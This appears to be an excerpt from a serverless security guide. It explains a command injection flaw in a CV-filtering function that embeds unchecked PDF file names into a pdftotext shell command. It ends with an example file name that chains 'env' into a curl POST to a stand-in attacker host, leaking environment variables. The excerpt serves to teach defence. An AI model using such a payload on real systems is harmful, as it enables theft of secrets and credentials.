In this example of a job candidate CV filtering system, a transformation converts the PDF file into text in order to perform text analytics. The transformation of the PDF file into text is done using a command line utility (pdftotext)

The developer of this serverless function assumes that users will provide legitimate PDF file names and does not perform any kind of sanity check on the incoming file name, except for the rudimentary check to make sure the file's extension is indeed .pdf. The file name is embedded directly into the shell command and this weakness allows a malicious user to inject shell commands as part of the PDF file name.

For example, the following PDF file name, will leak all environment variables of the currently executing function:

foobar;env|curl -H "Content-Type: text/plain" -X POST -d @- http://attacker.site/collector #.pdf